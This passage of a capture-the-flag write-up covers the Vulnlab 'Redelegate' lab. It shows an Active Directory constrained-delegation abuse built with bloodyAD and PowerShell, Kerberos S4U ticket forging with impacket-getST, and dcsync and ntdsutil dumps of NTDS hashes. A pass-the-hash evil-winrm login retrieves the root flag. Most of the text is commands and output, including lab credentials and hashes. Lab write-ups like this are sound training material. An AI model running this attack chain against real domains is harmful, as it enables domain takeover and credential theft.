-9f37-2a4de88f3063;;S-1-5-21-4024337825-2033394866-2055507597-527)(OA;ID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;;S-1-5-21-4024337825-2033394866-2055507597-512)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-4024337825-2033394866-2055507597-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
name: FS01
objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=redelegate,DC=vl
objectClass: top; person; organizationalPerson; user; computer
objectGUID: 0cdb28e9-77ab-4fff-a92e-964adfefe91a
objectSid: S-1-5-21-4024337825-2033394866-2055507597-1103
primaryGroupID: 515
pwdLastSet: 2024-11-26 09:48:45.536736+00:00
sAMAccountName: FS01$
sAMAccountType: 805306369
uSNChanged: 53568
uSNCreated: 24606
userAccountControl: WORKSTATION_TRUST_ACCOUNT
whenChanged: 2024-11-26 09:48:45+00:00
whenCreated: 2024-10-19 10:54:41+00:00
Set msDS-AllowedToDelegateTo to the resource we want to control (ldap on the domain controller in order to perform a dcsync):
$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' set object 'CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL' msDS-AllowedToDelegateTo -v "ldap/dc.redelegate.vl"
[+] CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL's msDS-AllowedToDelegateTo has been updated
Double check:
$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' get object 'CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL' --attr msDS-AllowedToDelegateTo
distinguishedName: CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL
msDS-AllowedToDelegateTo: ldap/dc.redelegate.vl
Update the userAccountControl attribute for the object FS01$ with the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag:
$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl
Double check all for FS01$:
$ impacket-findDelegation 'redelegate.vl'/'fs01$:Azerty1234!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------- ---------------------------------- --------------------- ----------
FS01$ Computer Constrained w/ Protocol Transition ldap/dc.redelegate.vl Yes
all good
- Using legacy Powershell commands in our helen.frost’s evil-winrm session:
- Set
msDS-AllowedToDelegateToto the resource we want to control (ldap on the DC in order to perform a dcsync) - Update the
userAccountControlattribute for the objectFS01$with theTRUSTED_TO_AUTHENTICATE_FOR_DELEGATIONflag:
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Add @{"msDS-AllowedToDelegateTo"="ldap/dc.redelegate.vl"}
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
OR
- Set
msDS-AllowedToDelegateToto the resource we want to control (cifs on the DC in order to impersonateryan.cooperas he is Domain Admin) - Update the
userAccountControlattribute for the objectFS01$with theTRUSTED_TO_AUTHENTICATE_FOR_DELEGATIONflag:
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> Set-ADComputer -Identity FS01 -Add @{'msDS-AllowedToDelegateTo'=@('cifs/dc.redelegate.vl')}
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
Thirdly, we use the FS01 machine account to request a service ticket as any domain user to the DC:
- As the
dcitself:
$ impacket-getST 'redelegate.vl'/'fs01$:Azerty1234!' -spn ldap/dc.redelegate.vl -impersonate dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
$ export KRB5CCNAME=dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
$ klist
Ticket cache: FILE:dc@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
Default principal: dc@redelegate.vl
Valid starting Expires Service principal
11/26/24 19:39:20 11/27/24 05:39:19 ldap/dc.redelegate.vl@REDELEGATE.VL
renew until 11/27/24 19:39:21
Double check that the authentication using the ticket works as expected:
$ nxc smb dc.redelegate.vl --use-kcache
SMB dc.redelegate.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB dc.redelegate.vl 445 DC [+] redelegate.vl\dc from ccache
All good
OR
- As the Domain Admin
ryan.cooper:
$ impacket-getST 'redelegate.vl'/'fs01$:Azerty1234!' -spn ldap/dc.redelegate.vl -impersonate ryan.cooper
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating ryan.cooper
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in ryan.cooper@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
$ export KRB5CCNAME=ryan.cooper@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
$ klist
Ticket cache: FILE:ryan.cooper@ldap_dc.redelegate.vl@REDELEGATE.VL.ccache
Default principal: ryan.cooper@redelegate.vl
Valid starting Expires Service principal
11/26/24 19:46:25 11/27/24 05:46:24 ldap/dc.redelegate.vl@REDELEGATE.VL
renew until 11/27/24 19:46:26
Finally we can procced to grab the Administrator hash via dcsync:
$ nxc smb dc.redelegate.vl --use-kcache --ntds --user Administrator
SMB dc.redelegate.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB dc.redelegate.vl 445 DC [+] redelegate.vl\dc from ccache
SMB dc.redelegate.vl 445 DC [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB dc.redelegate.vl 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB dc.redelegate.vl 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:a066fbf49e79f43fffc449810227e399:::
SMB dc.redelegate.vl 445 DC [+] Dumped 1 NTDS hashes to /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194440.ntds of which 1 were added to the database
SMB dc.redelegate.vl 445 DC [*] To extract only enabled accounts from the output file, run the following command:
SMB dc.redelegate.vl 445 DC [*] cat /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194440.ntds | grep -iv disabled | cut -d ':' -f1
SMB dc.redelegate.vl 445 DC [*] grep -iv disabled /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194440.ntds | cut -d ':' -f1
Or proceed with a full dump NTDS:
$ nxc smb dc.redelegate.vl --use-kcache -M ntdsutil
SMB dc.redelegate.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB dc.redelegate.vl 445 DC [+] redelegate.vl\ryan.cooper from ccache (Pwn3d!)
NTDSUTIL dc.redelegate.vl 445 DC [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\173261805
NTDSUTIL dc.redelegate.vl 445 DC Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL dc.redelegate.vl 445 DC [+] NTDS.dit dumped to C:\Windows\Temp\173261805
NTDSUTIL dc.redelegate.vl 445 DC [*] Copying NTDS dump to /tmp/tmph_o_nlb8
NTDSUTIL dc.redelegate.vl 445 DC [*] NTDS dump copied to /tmp/tmph_o_nlb8
NTDSUTIL dc.redelegate.vl 445 DC [+] Deleted C:\Windows\Temp\173261805 remote dump directory
NTDSUTIL dc.redelegate.vl 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL dc.redelegate.vl 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:a066fbf49e79f43fffc449810227e399:::
NTDSUTIL dc.redelegate.vl 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL dc.redelegate.vl 445 DC DC$:1002:aad3b435b51404eeaad3b435b51404ee:40e9fff83a2b1e607b7648eb74acb461:::
NTDSUTIL dc.redelegate.vl 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
NTDSUTIL dc.redelegate.vl 445 DC FS01$:1103:aad3b435b51404eeaad3b435b51404ee:6d817d0d58c8cbc298b0edb8448f46d8:::
NTDSUTIL dc.redelegate.vl 445 DC Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
NTDSUTIL dc.redelegate.vl 445 DC Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
NTDSUTIL dc.redelegate.vl 445 DC Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:6d817d0d58c8cbc298b0edb8448f46d8:::
NTDSUTIL dc.redelegate.vl 445 DC Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
NTDSUTIL dc.redelegate.vl 445 DC Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
NTDSUTIL dc.redelegate.vl 445 DC James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
NTDSUTIL dc.redelegate.vl 445 DC Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
NTDSUTIL dc.redelegate.vl 445 DC sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
NTDSUTIL dc.redelegate.vl 445 DC [+] Dumped 13 NTDS hashes to /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194729.ntds of which 11 were added to the database
NTDSUTIL dc.redelegate.vl 445 DC [*] To extract only enabled accounts from the output file, run the following command:
NTDSUTIL dc.redelegate.vl 445 DC [*] grep -iv disabled /home/user/.nxc/logs/DC_dc.redelegate.vl_2024-11-26_194729.ntds | cut -d ':' -f1
Then connect to the DC and get the root flag Redelegate_Root:
$ evil-winrm -i dc.redelegate.vl -u administrator -H 'a066fbf49e79f43fffc449810227e399'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
VL{3e75af0ec54eb6c3da6989cb61b50598}
Extra
Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=f53d69c1-9978-4bf1-ab03-6f5b0301943e

